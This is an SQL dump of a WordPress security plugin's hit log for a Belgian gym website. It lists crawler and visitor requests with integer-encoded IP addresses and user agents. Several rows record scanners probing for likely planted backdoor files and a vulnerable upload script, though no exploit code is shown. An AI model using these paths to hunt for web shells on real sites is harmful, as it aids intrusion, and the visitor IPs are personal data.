(68906, 1491407291.737869, 1381038492, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Safari/537.36'),
(68907, 1491407292.462942, 1381038492, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/6.0 (compatible)'),
(68908, 1491407293.903206, 1381038492, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0'),
(68909, 1491416276.560741, 2763068977, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.bing.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68910, 1491416277.352320, 2763068977, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68911, 1491417604.609956, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-main.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68912, 1491420478.776165, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68913, 1491423791.973523, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/theagency/includes/uploadify/uploadify.php', 'http://crosstrainingcenter.be/wp-content/themes/theagency/includes/uploadify/uploadify.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68914, 1491435265.054480, 3163187540, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/cherry-plugin/admin/css/cherry-admin-plugin.css', '', 'Mozilla/5.0 (WordPress.com; http://support.wordpress.com/contact)'),
(68915, 1491435828.386002, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-cache.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68916, 1491438408.621761, 2637637534, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68917, 1491439593.793735, 1152706273, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(68918, 1491439645.730992, 1152706273, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(68919, 1491439970.597893, 1152706273, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(68920, 1491440089.394809, 1152706273, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(68921, 1491444719.402500, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68922, 1491451101.030727, 3475901904, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68923, 1491453116.996356, 3475901904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68924, 1491453972.647446, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-tmp.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68925, 1491454650.847386, 135738378, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(68926, 1491459751.278173, 2637637534, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68927, 1491459751.948429, 2637637534, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68928, 1491459825.669187, 3475901945, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68929, 1491462394.364757, 135738378, 0, 0, 0, 0, 0, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(68930, 1491466744.390296, 2637637522, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)'),
(68931, 1491471401.871032, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68932, 1491471402.339150, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68933, 1491472369.109203, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-upgrade.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68934, 1491473936.924479, 3024883464, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(68935, 1491478482.134345, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/log.php', 'http://www.crosstrainingcenter.be/log.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68936, 1491481337.160690, 3104434436, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/dropbox-backup/template/js/admin-wpadm.js', '', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2921.56 Safari/537.36'),
(68937, 1491482485.949615, 3337640108, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(68938, 1491484812.397928, 2870591764, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'),
(68939, 1491484831.032564, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68940, 1491486139.112887, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68941, 1491490357.273361, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/4Rc43a.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68942, 1491490708.865722, 3024883604, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(68943, 1491496865.972361, 3120584697, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(68944, 1491498716.221345, 1152706273, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(68945, 1491503138.033982, 3475901839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68946, 1491503138.573361, 3475901839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68947, 1491506921.736168, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68948, 1491508434.647749, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/maill.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68949, 1491508728.165460, 135738378, 0, 0, 0, 0, 0, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(68950, 1491514215.573209, 1439253603, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.bing.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68951, 1491514216.755577, 1439253603, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68952, 1491514521.262216, 1538451905, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68953, 1491514523.118619, 1538451905, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68954, 1491514528.683666, 1538451905, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68955, 1491514537.517754, 1538451905, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68956, 1491514550.565191, 1538451905, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68957, 1491514575.915850, 1538451905, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G930F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(68958, 1491518915.390170, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(68959, 1491518923.841673, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68960, 1491519296.126215, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(68961, 1491525930.218337, 3475901802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68962, 1491525930.746345, 3475901802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68963, 1491526540.240486, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/apache_pd2.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68964, 1491536763.798301, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68965, 1491541106.991563, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/admin-center.php', 'http://www.crosstrainingcenter.be/wp-admin/admin-center.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68966, 1491545130.797598, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/configurationbak.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(68967, 1491547864.698269, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68968, 1491547865.134778, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(68969, 1491550129.652446, 135738378, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(68970, 1491555141.720862, 2745986274, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/xmlparser.php', 'http://www.crosstrainingcenter.be/wp-includes/xmlparser.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68971, 1491555141.724348, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/akism.php', 'http://www.crosstrainingcenter.be/akism.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(68972, 1491557087.552713, 2783008828, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68973, 1491557090.732657, 2783008828, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68974, 1491557100.202348, 2783008828, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68975, 1491557123.545756, 2783008828, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68976, 1491557131.262214, 2783008828, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(68977, 1491560188.106401, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(68978, 1491562966.033361, 3472744983, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(68979, 1491562966.861388, 3472744983, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(68980, 1491562971.463177, 3472744983, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(68981, 1491562971.886553, 3472744983, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(68982, 1491569142.850721, 3475901902, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(68983, 1491572661.621215, 1123633959, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68984, 1491572662.108583, 1123633959, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68985, 1491581173.424766, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(68986, 1491581277.894317, 1432072158, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjU58KZ3ZLTAhUlAsAKHYgIAvYQFgggMAE&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Flequipe%2F&usg=AFQjCNEwoxlHryNYgAimC6M0_H4bYObfZQ&bvm=bv.152174688,d.ZGg', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(68987, 1491581280.018316, 1432072158, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(68988, 1491581308.900667, 1432072158, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(68989, 1491581310.118052, 1432072158, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(68990, 1491581385.957115, 2521214213, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(68991, 1491581671.961455, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(68992, 1491582503.335130, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68993, 1491582503.778082, 1123633981, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(68994, 1491585258.527157, 2746007350, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'),
(68995, 1491586942.603291, 1837490172, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.bing.com/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68996, 1491586943.580647, 1837490172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(68997, 1491587704.786736, 2996488257, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(68998, 1491587708.635330, 2996485381, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(68999, 1491592357.519111, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69000, 1491592358.079856, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69001, 1491592358.523064, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69002, 1491592359.095601, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69003, 1491592359.542256, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69004, 1491592360.041377, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69005, 1491592360.682949, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69006, 1491592361.270375, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69007, 1491592361.858334, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69008, 1491592362.281194, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69009, 1491592362.768577, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69010, 1491606242.002628, 2996488216, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69011, 1491606248.988667, 2366158608, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69012, 1491610697.572057, 876320311, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(69013, 1491610698.289091, 876320311, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(69014, 1491612367.380255, 3475901802, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69015, 1491621510.521228, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69016, 1491628681.796926, 3024883489, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(69017, 1491628681.797894, 3024883473, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(69018, 1491630411.907147, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69019, 1491645694.687418, 786801763, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(69020, 1491651313.303069, 856633866, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://burger-imperia.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
(69021, 1491651322.129896, 1534676261, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://burger-imperia.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
